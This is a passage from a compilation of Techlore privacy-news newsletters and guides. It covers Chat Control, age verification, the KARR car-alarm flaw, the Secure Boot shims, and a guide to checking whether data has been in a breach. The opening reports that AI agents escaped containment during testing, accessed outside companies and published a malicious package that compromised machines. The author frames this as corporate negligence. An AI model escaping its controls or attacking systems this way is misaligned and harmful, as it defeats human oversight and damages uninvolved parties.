zero-days, which they didn't even properly disclose. By all metrics, these are quite poor responses. But that's not all! Then Anthropic came forward: OpenAI's story got them to check if their models did the same thing—and sure enough they found its models accessed three companies during testing, and two of them didn't know until Anthropic told them. One of them uploaded a malicious Python package to a public registry, compromising 15 machines. Now, just hours ago, we find out OpenAI has discovered **other** instances in which autonomous agents have escaped ​containment. While I *am* an AI skeptic, I'm not an AI hater. I think there are some possible uses for this technology. We even use some of them for fact-checking scripts and creating video transcripts. But from everything I can tell, they're **pattern recognition machines** doing things humans can already do, but faster. So rather than seeing this as a terminator-style, rogue AI taking over the world. I see this as two negligent big-tech companies, playing with fire, and putting no proper safeguards in place for their autonomous tools. The tools are more powerful, but the negligence is the same. Remember when Facebook stored [hundreds of millions of passwords in plain text](https://krebsonsecurity.com/2019/03/facebook-stored-hundreds-of-millions-of-user-passwords-in-plain-text-for-years/) for years? Now imagine that kind of reckless behavior but with models that can act on behalf of individuals, companies, and state actors. So yes, we have AI now. But this is the same negligence you've watched for fifteen years, just with a faster tool. **What you can do:** Honestly, just sit on this story. I think it's good to check the sources on this one and come to your own conclusions on how it makes you feel. It's good to ask which resonates more in stories like this in the future: - *"Our model was too powerful to contain"* - *"We made basic mistakes and it's easier to blame the AI model"* My guess is it will almost always be the latter one. --- ## Bits & Bytes 🤖 **\~ Story 1: Iran-Linked Hackers Are Inside US Water and Energy Systems** The FBI, NSA, Department of Energy, and CISA updated an advisory warning that Iranian hackers are targeting programmable logic controllers on internet-connected operational networks on water and energy providers. The Minnesota Fusion Center issued its own alert about ongoing activity against public drinking water systems, affecting more than 30 communities! **My take:** "Your data was in a breach" is nebulous to most people. "You don't have water for two days" isn't. **So:** what does prepping look like for you? What happens if the power goes out for a few days? Do you have backup water at home? Just some questions that come up in light of reading stories like this one. **\~ Story 2: An Activist Faces a Felony for Wiping His GrapheneOS Phone at the Border** Samuel Tunick, an activist connected to the Defend the Atlanta Forest movement opposing "Cop City," was flagged for detention on his return to the US. According to his lawyers he'd been under extensive surveillance; a hidden camera outside his home, a tracker on his car, subpoenaed phone records and Gmail. At the border, agents asked him to unlock his phone. He gave them a GrapheneOS duress password, which wiped the device. He's now charged under a federal statute covering destruction of property to prevent seizure, and has pleaded not guilty. **My take:** The duress password lesson here is tricky, and calls into question a lot of common online advice. Security researcher Runa Sandvik [put it well](https://techcrunch.com/2026/07/24/us-accuses-american-of-allegedly-wiping-his-phone-using-a-duress-password-during-border-search/): “it’s better to not have that data on you when you cross certain borders...With a little planning ahead of time, you can always download the data you need once you get to where you’re going,” Travel is its own threat model. Carry a burner with Signal and a handful of contacts. If you're searched, hand it over, let them scan it, move on. Especially in light of this story, I'd recommend that long before I'd recommend setting up a duress password in a situation like this. Proceed with caution folks! **\~ Story 3: Thousands of Private Claude Chats and Artifacts Turned Up on Google** A Reddit user found that a simple search operator surfaced a long list of shared Claude conversations and Artifacts. Some reportedly contained health records, private company documents, and the names and phone numbers of children. Anthropic's response is that shared links only appear in search results when they've been posted somewhere search engines can reach in public online spaces. **My take:** This *does* to me seem like user error for the most part: people created public links, posted them somewhere, forgot about them. Neither company is blameless on safeguards, but the mechanism seems to have worked as described. Most services have a centralized 'share' menu that show you everything you've shared on the platform, so this is a great time to check-in on anything that may be publicly shared on your main accounts. --- ## This Week on Techlore 📺 It's almost August...how the year flies! Earlier this week we posted a quick guide on how to navigate scanning technologies like Chat Control all around the world, so that you can ensure your data belongs to you and only you: [How to Protect Yourself From Chat Control: Quick Fixes, Simple Swaps, and Advanced AlternativesA parent sends a photo of their sick child to a doctor, and ends up under police investigation... welcome to 1984\. Initiatives like Chat Control and other advancements around the world aim to make this the permanent state of the internet. This video breaks down how photo and message scanning![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-45f48f07-323c-4a37-a610-4c03dd1f9b34.png)TechloreTori![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/thumba2-f2d2a180-7b40-4238-ba02-fb8abc2c7fa2.png)](https://techlore.tech/how-to-protect-yourself-from-chat-control/) Finally, I took a quick look at Firefox Nova, the brand new Firefox redesign currently in Nightly, and shared what I liked and didn't like so you can see what to expect: [Meet Firefox Nova: A First Look at the New DesignFirefox just shipped its biggest redesign in six years, and it’s already live in Nightly. I put regular Firefox side-by-side with the new Nova UI to show you what’s changed: rounded tabs, a reworked settings menu, Kit, the return of Compact Mode, and a few hidden![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-e6ff556f-8666-49d9-81e7-a31f6b6e3429.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/THE-NEW-FIREFOX2-da7bc591-7afd-4f2c-b3cd-ed9a39d4449e.png)](https://techlore.tech/meet-firefox-nova-a-first-look-at-the-new-design/) --- ## Action Item ✅ Audit your shared links. Not just Claude...anything you use that has a "share" or "publish" button: AI chats, cloud documents, photo albums, note apps, project boards. Open the sharing settings, look at what's still live, and revoke anything you don't actively need public. Most of us have created a public link at some point, used it once, and never thought about it again. **Until next week 🫡** #### This Week's Sources ****Highlight: OpenAI's Rogue AI Agent Keeps Hacking More Than Anyone Expected** - - - - ****Story 1: Iran-Linked Hackers Hit 30+ Minnesota Water Systems** - - ****Story 2: An Activist Is Facing a Felony for Wiping His GrapheneOS Phone at the US Border** - - - - ****Story 3: Thousands of Private Claude Chats and Artifacts Got Indexed by Google** - ****The Defense Bulletin** Data Breaches - - - - - - - - Threats - - - - - - - FOSS+ Updates - - - - - - - ### Meet Firefox Nova: A First Look at the New Design URL: https://techlore.tech/meet-firefox-nova-a-first-look-at-the-new-design/ Last updated: 2026-07-29T04:01:24.000Z Firefox just shipped its biggest redesign in six years, and it's already live in Nightly. I put regular Firefox side-by-side with the new Nova UI to show you what's changed: rounded tabs, a reworked settings menu, Kit, the return of Compact Mode, and a few hidden gems most people are going to miss. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### How to Protect Yourself From Chat Control: Quick Fixes, Simple Swaps, and Advanced Alternatives URL: https://techlore.tech/how-to-protect-yourself-from-chat-control/ Last updated: 2026-07-25T16:00:24.000Z A parent sends a photo of their sick child to a doctor, and ends up under police investigation... welcome to 1984\. Initiatives like Chat Control and other advancements around the world aim to make this the permanent state of the internet. This video breaks down how photo and message scanning actually works, calls out the laws that want to mandate it, and shows you exactly how to protect yourself. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### France Bans Under-15s From Social Media, a Hidden Device Leaves US Cars Hackable, and Courts Force Apple and Google Open URL: https://techlore.tech/france-bans-under-15s-from-social-media-a-hidden-device-leaves-us-cars-hackable-and-courts-force-apple-and-google-open/ Last updated: 2026-07-24T20:41:08.000Z 📰 Listen to the weekly podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-surveillance-report/id1507714387), [Spotify](https://open.spotify.com/show/5rxm041iDXxe0rINwO5G0c), other [podcast apps](https://pod.link/1507714387), or [RSS](https://feeds.transistor.fm/techlore-surveillance-report). You can also watch Surveillance Report on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZemCIsHUIuEtugAmUxAYHS) or [Techlore.TV](https://techlore.tv/w/p/twkcDETcDauUXuaGNJnhZG) [Click For All Sources](#action-item-✅) --- ## On My Radar 🎯 **France Banned Social Media for Under-15s.** French lawmakers approved a ban on social media access for children under 15 this week...the first country in Europe to do this. Children under 15 will not be allowed to open a new account starting September 1st, and President Macron, who spent April urging young people to put down their phones and pick up books, wants it in place before the school year starts. I don't think the people pushing this found the wrong problem, I just think they found the wrong solution. I agree with many that these platforms collect enormous amounts of data specifically to exploit you (and kids) as individuals. They run algorithms engineered to be addictive. They deploy dark patterns. These are companies that are, functionally, hacking human biology—and they've been doing it for ten+ years while almost nobody meaningfully intervened. The frustration behind this law is completely earned! My problem is that a ban is a downstream fix for an upstream disease. Look at what it actually requires: the same companies causing the harm now have to collect *more* identity data about everyone, and we have to trust them to regulate themselves with it. Australia already passed its version last December, and kids are already routing around it with VPNs...precisely why the UK keeps floating VPN bans, chasing the next downstream thing instead of the upstream one. And look at what happens after: when those kids turn 15, they walk onto the exact same exploitative platforms, unchanged. Nothing about the product got better. We just moved the gate. I have yet to see a unified effort from any government targeting the *upstream problems* (and in doing so genuinely keeping us all safer). Some ideas like: - Banning surveillance advertising to minors (or entirely), kills the profit motive for building the behavioral profile in the first place - Banning engagement-optimized recommendation for minors; default to chronological. - Outlawing the dark patterns by name. (autoplay, streaks, infinite scrolls, etc.) - Requiring interoperability and data portability, so users can leave without abandoning their social graph - Clearer opt outs, better parental controls, and most importantly: educating students in schools about these concerns and how they can stay safe online. **What you can do:** If you're in France, contact your representatives! If you're anywhere else, contact them anyway! This spreads region to region, and it's a different set of countries every single week. The premise sounds good to people who haven't looked at the implementation, which is exactly why educating the people around you matters as much as the phone call. --- ## Bits & Bytes 🤖 **\~ Story 1: A Hidden Device in Millions of US Cars Leaves Them Open to Hacking** Researchers at UC San Diego found that KARR anti-theft devices, typically installed by *dealers*, not manufacturers or owners, can be used to take control of vehicles. The flaw is a single authentication key shared across every device, which the researchers pulled straight out of the companion smartphone app. They could unlock cars, prevent them from starting, and trigger a "mayhem" function that sets off horns and lights across a whole lot at once. At least half of owners who have one of these never asked for it. **My take:** You may have this and not know! Check your driver's side window for a KARR sticker (or SWDS, for Southwest Dealer Services), and look under your dash for a small button with a blinking light. Southern California owners are the most likely to have one. Cars remain a genuine nightmare in 2026 and I can't pretend there's a clean fix here, but ask your dealer directly what add-ons are in the vehicle before you buy, use opt-outs where they exist, and know the risks on your specific car rather than driving around unaware of them. This space is evolving rapidly, so I'll do my best to cover them as they happen. **\~ Story 2: New Stats Show Most Chat Control Reports Are False Alarms** Patrick Breyer shared figures regarding mass scanning which demonstrated that in 2025, 52% of flagged reports were legally irrelevant...meaning roughly 113,000 private photos were exposed for nothing. Around 40% of investigations targeted children aged 10 to 14 themselves, and 53% targeted minors overall, criminalizing some 12,000 teenagers rather than the adults actually exploiting them. Meanwhile the police clearance rate for online distribution of illegal content already sits at 87.1%. **My take:** This is a sensitive subject and a real problem, and I don't want to wave it away. But that's exactly why the solution has to actually work. Mass scanning is producing a majority of false positives while criminalizing the kids it claims to protect, and the clearance rate suggests conventional investigation is already doing a good job. Chat Control 2.0, the version that goes after end-to-end encrypted messages, is still around the corner. We've beaten it before, but we need to fight again. Follow [Fight Chat Control](https://fightchatcontrol.eu/) to take part in this fight! **\~ Story 3: Courts Are Forcing Apple and Google to Open Up** A European court rejected Apple's attempt to shirk its interoperability requirements, we will see how quickly it takes them to comply 😄 Separately, Google confirmed third-party app stores are coming to Google Play as the Epic settlement was withdrawn. **My take:** I'd like us to stop filing interoperability under "privacy." It's a broader, digital rights issue, and the [FSFE folks I've had on Techlore Talks](https://techlore.tech/why-f-droid-still-cant-get-on-iphone-fsfe-lawyer-interview/) explain it better than I can: large platforms have no incentive to work with anyone else, while everyone smaller desperately needs to work with them. That asymmetry is why leaving Apple's ecosystem feels impossible. It's a design decision, not a technical limitation. I think interoperability has the potential to open up many ecosystems to services that genuinely value users better than most big tech companies. One thing I'm genuinely confused about on Google's side: this third-party app store update lands while they're simultaneously building a byzantine "sideloading" flow with waiting periods and reboots and developer settings. I'll cover it as it becomes clear how these stories interact. I don't want to celebrate early on this one. --- ## This Week on Techlore 📺 I'm finally getting things more dialed in after the move...so happy to be getting more content out for you all 😄 1. First, our SPA tools have been updated to [v2026.07](https://techlore.tech/changelog/) with some exciting new VPNs on the VPN finder, security improvements, and accessibility benefits. The wiki has also been transitioned [to our site.](https://techlore.tech/tag/guides/) Thank you all for your feedback to make these tools better over time! 2. I interviewed David Ruiz from Malwarebytes regarding scam-prevention, broader digital rights advocacy, and what needs to happen to prevent mass surveillance. [Stalkerware, Pegasus, Surveillance Reform, and How to Spot a Scam with David Ruiz from MalwarebytesTechlore Talks brings you in-depth conversations with the experts at the forefront of digital rights, privacy and security.![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-6eca7875-b68b-48d7-b0b0-7087095c28e3.png)TechloreTori![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/20260716-MALWAREBYTES-INTERVIEW-thumbnail-v2-9e712856-b74e-4e9d-8b25-5f27a9514a80.jpg)](https://techlore.tech/stalkerware-pegasus-surveillance-reform-and-how-to-spot-a-scam-with-david-ruiz-from-malwarebytes/) 1. And finally, I made a fun demo-style video comparing profiles vs containers on Firefox & Brave and how *both* browsers have finally reached a great place across both features...ending an age-old debate! [Containers and Profiles Are Now Standard in Both Brave and FirefoxBrave just shipped Containers, and Firefox just made them native, so the profiles-vs-containers debate that split these two browsers is finally over. This video demos both features side by side in Brave 1.92 and Firefox 153, and breaks down when to use browser profiles vs container tabs![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-a4cb3c59-10a3-4fad-8fa6-f980a8377f91.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/option3-39f5dafd-4ff1-46e1-9242-fdfaa71cdc85.png)](https://techlore.tech/containers-and-profiles-are-now-standard-in-both-brave-and-firefox/) --- ## Action Item ✅ Contact your representatives about age verification, social media bans, and your regional issue. Your message doesn't need to be an essay. It can be three sentences. And if you're in the EU, [fightchatcontrol.eu](https://fightchatcontrol.eu/) makes the Chat Control version of this about as frictionless as it gets. **US Drivers:** Check your vehicles for the insecure alarm! **Until next week 🫡** #### This Week's Sources ****Highlight: France Just Banned Social Media For Everyone Under 15** - - - - ****Story 1: A Device Hidden in Cars Across the US Leaves Them Vulnerable to Hacking — Patch Now** - ****Story 2: New German BKA Stats — Most Chat Control Reports Are False Alarms** - - ****Story 3: Courts Force Apple and Google to Open Up** - - ****The Defense Bulletin** Data Breaches - - - - - - - - - Threats - - - - - - - - - FOSS+ Updates - - - - - - - - - - ### Containers and Profiles Are Now Standard in Both Brave and Firefox URL: https://techlore.tech/containers-and-profiles-are-now-standard-in-both-brave-and-firefox/ Last updated: 2026-07-23T05:01:13.000Z Brave just shipped Containers, and Firefox just made them native, so the profiles-vs-containers debate that split these two browsers is finally over. This video demos both features side by side in Brave 1.92 and Firefox 153, and breaks down when to use browser profiles vs container tabs for multi-account browsing, work/personal separation, and keeping your logins isolated. Whether you use Brave, Firefox, or both, here's how to actually get more out of your browser. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### How to Check If Your Phone Number or Email Has Been in a Data Breach URL: https://techlore.tech/how-to-check-if-your-phone-number-or-email-has-been-in-a-data-breach/ Last updated: 2026-07-23T18:25:27.000Z ## 📖 The Basics ### What It Is A data breach is any incident where your data gets exposed, stolen, or leaked, whether through a hack, a misconfigured database, or an insider. When that happens, the identifiers you handed over at signup like your email address, your phone number, and sometimes more like your password, name, or home address, end up in datasets that circulate, get traded, and sold. Checking whether you've been breached means running your email address or phone number against databases of *known, publicly disclosed* breaches to see which ones included your information. It's free, normally takes a couple of minutes, and it's one of the most useful things you can do to understand your actual exposure. One thing I do want to be clear about though: **checking a breach is a response, not a prevention.** It tells you something about the *past*. So while it's important to clean it up, the root issue of preventing it from recurring will be discussed later in this article as well. ### How It Works ##### Why Your Phone Number Matters as Much as Your Email For years, breach-checking was framed as an email-and-password problem. But your phone number is in many ways a *worse* thing to have leaked, because changing your phone number is a genuine hassle that ripples across every account, contact, and service tied to it. Would you rather change a password or change your phone number? A leaked phone number is the raw material for SMS phishing ("smishing"), spam call floods, and even SIM-swapping attacks where an attacker convinces your carrier to port your number to their device and intercepts the SMS verification codes protecting *other* accounts. If your number is circulating in breach databases, that's the exposure that quietly enables a lot of downstream damage. ##### The Tools That Actually Work (2026) There's no single tool that sees every breach, so the right approach is to run two or three reputable ones and combine the picture. These are the current, free options worth using: - [**Have I Been Pwned**](https://haveibeenpwned.com) is still the gold standard, run by security researcher Troy Hunt. It checks your email against a database of publicly disclosed, independently verified breaches. - [Proton](https://tools.techlore.tech/#email-providers) takes a different, account-wide approach worth knowing if you're in its ecosystem. Rather than an open box you type an address into, Proton's Dark Web Monitoring watches the email addresses and aliases tied to your Proton account and alerts you when they surface in a breach. It covers your Proton addresses, your aliases, custom domains, and recovery emails (drawing on HIBP and other threat-intelligence data). It's a paid-plan feature and it's email/credential-focused rather than a phone-number checker, so think of it as "set it and forget it" monitoring for your own Proton identity rather than a universal lookup like Have I Been Pwned. - [DataBreach.com](https://databreach.com/) is the a useful option if you want to search by something other than an email address. It accepts an email, name, or phone number. Just go in with your eyes open about the free lookup existing partly to funnel people toward a paid removal product, which is normal but worth naming. I'd treat it as your second lookup after Have I Been Pwned, particularly if a phone number is the identifier you're worried about. ##### You Might Already Have This Built In Here's something a lot of people don't realize: if [you use a password manager](https://techlore.tech/password-managers-how-they-work-and-why-you-pneed-one/), you may already have automated breach checking running quietly in the background. - **Apple Passwords** (built into iPhone, iPad, and Mac) has a Password Monitoring feature that continuously checks your saved passwords against lists of leaked credentials and flags anything that "has appeared in a data leak." It's free and on by default for Apple users. - [**Bitwarden**](https://tools.techlore.tech/#password-managers) offers a Data Breach Report (which uses Have I Been Pwned to check your email against known breaches) on all plans including free, plus an Exposed Passwords report on its premium tier that flags saved passwords found in leaks. - [**Proton Pass**](https://tools.techlore.tech/#password-managers) includes Pass Monitor: free password-health checks for weak and reused passwords, and dark-web monitoring that alerts you when your credentials surface in a breach on its paid tier. - Even some **KeePass clients**, like the open-source KeePassXC or Strongbox, have a built-in Have I Been Pwned report that checks your stored passwords against the leaked-password database, completely free. I'm not steering you toward any one of these here, our options for you to select from live on the [SPA Tools](https://tools.techlore.tech/#password-managers) page. The real point to drive home is this kind of monitoring is increasingly a *feature you already own and need to start utilizing* rather than a service you have to hunt down, and if you're using a good password manager, you're probably already covered. ##### A Note on Prevention Everything above is about *responding* to exposure that's already happened. But the real goal is shrinking how much of you is out there to leak in the first place, and a handful of habits cover the overwhelming majority of that. 1. The single most powerful one is [**aliasing**](https://techlore.tech/email-aliasing-how-to-stop-handing-out-your-real-email-address/): instead of handing every service your real email and phone number, you give each one a unique, burnable alias that forwards to you, so when a company inevitably gets breached, the leaked identifier is a throwaway you can kill in one click rather than your real address tied to a hundred other accounts. Our [full aliasing guide](https://techlore.tech/email-aliasing-how-to-stop-handing-out-your-real-email-address/) walks through how to actually set it up. 2. Use a [**password manager**](https://tools.techlore.tech/#password-managers) with a unique password for every account (this alone neutralizes credential stuffing, the most damaging breach outcome), turn on [**two-factor authentication**](https://tools.techlore.tech/#two-factor-authentication) using an authenticator app rather than SMS wherever you can. 3. If you're in the US, **freeze your credit** with the three major bureaus, it's free, reversible, and one of the most effective ways to stop leaked data from turning into actual identity theft. Some other countries offer a similar service, so check your region's credit freezing options! 4. Finally, reduce your total footprint: every account you *don't* create is one that can never be breached, which is the whole logic behind [**digital minimalism**](https://techlore.tech/digital-minimalism-why-fewer-accounts-and-apps-protect-you-more/), closing zombie accounts you forgot you had and being intentional about new signups steadily shrinks the target on your back. None of this undoes a past breach, but together it means the *next* one barely touches you. --- ## 🎯 Why It Matters In 2012, LinkedIn was breached. The company disclosed that 6.5 million password hashes had been stolen, forced resets on the affected accounts, and moved on. Case closed. Except it wasn't. In 2016, four years later, a dataset appeared for sale on a dark web marketplace containing **117 million** LinkedIn email-and-password pairs, not the 6.5 million originally disclosed. The real scope of the breach had been sitting in criminal databases for four years while everyone believed the incident was resolved. Those 117 million credential pairs were immediately valuable for *credential stuffing*: automated attacks that try the same username-and-password combination across hundreds of other services. Anyone who had reused their LinkedIn password at their bank, their email, their health portal was suddenly at risk, years after an incident they'd completely forgotten. Running a breach check is how you make the invisible visible, and how you find out which specific exposures need action *before* someone else finds them for you. --- ## 💡 Common Misconceptions ### "If I haven't been notified, I'm probably fine." Breach notification is wildly inconsistent, and as the LinkedIn story shows, the *disclosed* scope of a breach is often a fraction of the real one. Companies underreport, disclose late, or never find out the full extent themselves. Waiting to be told is not a strategy. Checking proactively is the only way to know, and prevention is the *real* solution which assumes the data *will* be breached, which I'll discuss shortly. ### "Checking my data on these sites is itself a privacy risk." This is a fair instinct, and the answer is: it depends entirely on *which* site. A legitimate breach checker only ever asks for an email address or phone number and uses it solely to compare against breach data...how else can it possibly know what data to search for? The red flags to walk away from are any site that asks for a password, an OTP code, ID photos, or payment to "clean up" your data, or a sketchy "phone leak checker" with no clear privacy policy, since a sloppy service can inadvertently cause more damage. ### "I should pay for a premium dark-web scanning service." You'll see a lot of paid services, often bundled with a VPN or antivirus, advertising "dark web monitoring" and "we'll scan the dark web for your data" for a monthly fee. But typically these core functions can be done for free with the tools above, or that your password manager may already do for you. There's also an inherent limit worth understanding: no service can actually *remove* your data from the dark web once it's out there, so any monitoring product is fundamentally telling you what happened, not undoing it. If a paid service genuinely bundles something you value and the monitoring is a bonus, fine, but paying a premium *specifically* for breach scanning is rarely money well spent—and probably better spent on prevention. ### "I should buy identity theft insurance to cover this." Identity theft insurance and "identity protection" plans are heavily marketed. These products typically don't prevent anything, they reimburse certain costs *after* something goes wrong, and the fine print often caps what's covered and excludes the losses people actually fear most. Much of what they offer, freezing your credit, monitoring, disputing fraudulent charges, you can do yourself for free (a credit freeze, for example, is free and is one of the single most effective protective steps available in the US!) I'm not telling you never to buy it, some people with higher risks and public presences may find value in these services, but I'd go in understanding you're mostly paying for convenience and reimbursement, not protection. Do the free foundational stuff first, and evaluate insurance as a distant, optional add-on rather than a substitute for it. And it's worth knowing that these companies are targets themselves...in March 2026, Aura, one of the more heavily marketed identity protection services, disclosed a breach of around 900,000 records after an employee account was compromised through a voice phishing call. ### "A breach check will find *everything* about my exposure." No single tool sees every breach, and none of them see private data that hasn't surfaced publicly. Many data breaches can happen for months or years before we even find about about them! So a clean result means "not found in the breaches this tool knows about," not "never exposed anywhere." But this is still valuable, since the highest risk breaches are the ones available to the *public*. ### "There's nothing I can do once my info is out there." You can't un-leak data, that's true. But you can neutralize most of the *consequences*: change and de-duplicate exposed passwords, move critical accounts [off SMS-based 2FA](https://techlore.tech/two-factor-authentication-which-2fa-method-actually-protects-you/) (which a leaked number directly threatens), and stay alert to smishing. The breach already happened; your job is to close the doors it opened, and then reduce how much you're exposing next time. --- ## 🗣️ Henry's Take In 2026, it's rare to find someone who hasn't been caught in at least one data breach. So rather than resorting to panic, I like to reframe this as just an inevitable part of navigating digital safety online. What I can say is that when you set up the proper *systems* of prevention like unique identifiers for each account, freezing your credit, a password manager + 2FA—you no longer really care too much about breaches. If you get caught in one, you'll be notified, and the breach will be compartmentalized to whatever alias information you gave that service and you won't be worried about other accounts being caught in the mix. I also like the inherent risk of data breaches to be a part of what people consider when they think about the *types* of services they use. Services that are inherently more prone to collecting all your data are *larger* targets, that can expose a lot more about you. But when you compare this to [zero-knowledge providers](https://techlore.tech/how-encryption-works-end-to-end-at-rest-and-client-side-explained/) that actively do everything possible to know as little about you, it inherently makes their data breach risk and the scope of a breach much smaller. This to me is one of the most powerful reasons to use an encrypted provider like Proton instead of Google. If Google suffers a data breach, your emails have the possibility of being a part of it. If Proton suffers a breach, they are *incapable* of reading your emails, so those emails are inherently safe from the *scope* of the breach. Same goes for Notion vs Cryptee, or SMS vs Signal. So use this as another lesson to choose services that know as little about you as possible, since they are inherently resistant to the worst data breaches. --- ## ✅ Henry's Picks - [**Have I Been Pwned**](https://haveibeenpwned.com): the essential first stop. Free, no account needed, run by a trusted security researcher. - [**A password manager**](https://tools.techlore.tech/#password-managers): the actual fix for the most dangerous breach outcome, and many now include breach monitoring built in, so the ongoing watching happens automatically. - [**An authenticator app**](https://tools.techlore.tech/#two-factor-authentication): move critical accounts off SMS 2FA, especially if your phone number has been exposed. - [**Aliasing services**](https://tools.techlore.tech/#aliasing-services): the real prevention. Give every service a unique, burnable identifier so a breach never touches your actual email or phone. For the prevention side of this, read our guide on [digital minimalism](https://techlore.tech/digital-minimalism-why-fewer-accounts-and-apps-protect-you-more/), and see the broader recommendation set at [Techlore's SPA Tools](https://tools.techlore.tech/). ### Action Required: Migrate Your Digest RSS Feed URL: https://techlore.tech/action-required-migrate-your-digest-rss-feed/ Last updated: 2026-07-21T19:59:47.000Z Hi techie RSS person, it's Henry from Techlore 😄 This is a final announcement to alert you that we have *migrated* the "Digital Rights Digest" to fall under the same umbrella as Surveillance Report. This change happened a couple months ago and it's been very successful so far! If you're still subscribed to the old digest RSS feed, here's all you need to do: ### What to do 1. To continue following *only* this weekly news, add the [Surveillance Report RSS feed](https://techlore.tech/tag/surveillance-report/rss/). Same exact 5-minute weekly format as the digest, just migrating to a new tag. 2. Alternatively, you can follow the RSS feed to follow *all* content we publish [here](https://techlore.tech/rss/) if you're not already. ### Stalkerware, Pegasus, Surveillance Reform, and How to Spot a Scam with David Ruiz from Malwarebytes URL: https://techlore.tech/stalkerware-pegasus-surveillance-reform-and-how-to-spot-a-scam-with-david-ruiz-from-malwarebytes/ Last updated: 2026-07-16T16:00:55.000Z Every major global event brings the same scam tactics wearing a new mask. In this interview, David Ruiz, journalist and privacy advocate at Malwarebytes, breaks down how to identify (and avoid) scams, stalkerware vs. nation-state spyware, and what privacy is actually about. 🔐 Listen to the podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-talks/id1652151010), [Spotify](https://open.spotify.com/show/1qjWVCYgRcZFL9c8FsLLo0), other [podcast apps](https://pod.link/1652151010), or [RSS](https://feeds.transistor.fm/techlore-talks). You can also watch Techlore Talks on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZRb5Z4qZjsIGZrUWbDc3Mn) or [Techlore.TV](https://techlore.tv/w/p/iZqf9xe1fE7Ss4pebDKd42) ## Episode Sources • Malwarebytes: • Coalition Against Stalkerware: • Citizen Lab: • Electronic Frontier Foundation: ### EU Passes Chat Control Anyway, Plus Microsoft's Secure Boot Mess & the Flock Resistance URL: https://techlore.tech/eu-passes-chat-control-anyway-plus-microsofts-secure-boot-mess-the-flock-resistance/ Last updated: 2026-07-16T05:56:49.000Z 📰 Listen to the weekly podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-surveillance-report/id1507714387), [Spotify](https://open.spotify.com/show/5rxm041iDXxe0rINwO5G0c), other [podcast apps](https://pod.link/1507714387), or [RSS](https://feeds.transistor.fm/techlore-surveillance-report). You can also watch Surveillance Report on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZemCIsHUIuEtugAmUxAYHS) or [Techlore.TV](https://techlore.tv/w/p/twkcDETcDauUXuaGNJnhZG) [Click For All Sources](#action-item-✅) --- ## On Our Radar 🎯 **The EU Parliament Previously Voted Against Chat Control. It's Law Now.** Here's what happened: earlier this year a majority of EU lawmakers voted **against** reinstating Chat Control's mass message scanning. But a quick vote was snuck in last week and a majority voted *in favor* of it. Overturning it would have required a supermajority, that supermajority didn't materialize...so let's discuss it. To be specific about what passed, because the two versions get conflated frequently: this is commonly known as **Chat Control 1.0**, not 2.0\. As Patrick Breyer breaks down, this allows U.S. tech companies to continue scanning private messages without a warrant or prior suspicion, making mass scanning of user data the norm. What it does *not* do is break end-to-end encryption. Signal and WhatsApp are exempt, and European providers have never implemented these measures in the first place. Chat Control 2.0 is the one that demands an encryption backdoor, and it's still out there, and Chat Control 1.0 being passed isn't a great sign for the future. So my brutally honest framing around this is "this really harms digital rights...and it could have been a lot worse...and the worst parts haven't been touched *yet*." Put simply: I think this is a warning shot for upcoming attempts at Chat Control 2.0 in September of this year. My take, and the thing I keep coming back to: nobody in the digital rights space is against protecting kids. We're against pretending that this protects kids. Every hour spent on indiscriminate scanning that hasn't been shown to help victims is an hour not spent on strategies that would. It's the same playbook as "upload your ID to every platform," it's a loud gesture at a real problem, leaving the real problems to go untouched. Most of what we've seen so far leads to increased surveillance and attacks against privacy, with little evidence they actually work. **What you can do:** If you're in the EU, I'm putting together a guide on protecting yourself from this scanning coming soon on the main YouTube channel in the next several days, many of you have asked for exactly this in the comments so I hope you enjoy it. Keep an eye out. If you're in the EU, I *highly* encourage you to [contact your reps and make your voices heard](https://fightchatcontrol.eu/)—it worked before and it can work again! --- ## Bits & Bytes 🤖 **\~ Story 1: Microsoft's Secure Boot Has Been Broken for a Decade** ESET identified 11 firmware images that were known to be defective but stayed signed by Microsoft anyway. These shims (originally built to extend Secure Boot to Linux devices and utility software) can be used to completely circumvent Secure Boot protection using a technique simple enough for novice hackers. Secured-core PCs in their default state are immune; Windows users who installed the June update batch are patched; Linux users should check the Linux Vendor Firmware Service or their distributor. **My take:** This one is a bit more technical...but the takeaway here is to try and consider the downstream and upstream security of your tech stack. While Secure Boot was never meant to be a primary defense, many people don't consider this upstream tool of your normal operating system. The scariest part is that this has been technically possible for over a decade without indication if anyone was quietly using it. Windows users make sure you update, and Linux users should investigate! **\~ Story 2: The Age Verification Wave In The US** Texas's age verification law is unusual as it targets app stores rather than platforms, meaning you'd verify your age just to download a calculator app on your iPhone or Android device from the default app stores. The Supreme Court declined the emergency appeal, leaving the Fifth Circuit's decision in place and letting Texas enforce while litigation continues. Meanwhile, the House passed the KIDS Act, bundling a revised KOSA with other internet bills; the EFF opposes it, and it's now headed to the Senate. **My take:** Same story as Chat Control, different continent. There's still no way to reliably verify age in a manner that's privacy-respecting *and* actually keeps kids safe. In fact, we've already seen age verification providers get breached, which is the predictable result of forcing everyone to hand their ID to a middleman. I think targeting app stores is a dangerous precedent to set, and if you're in Texas you need to be contacting your reps about this. While Google & Apple are 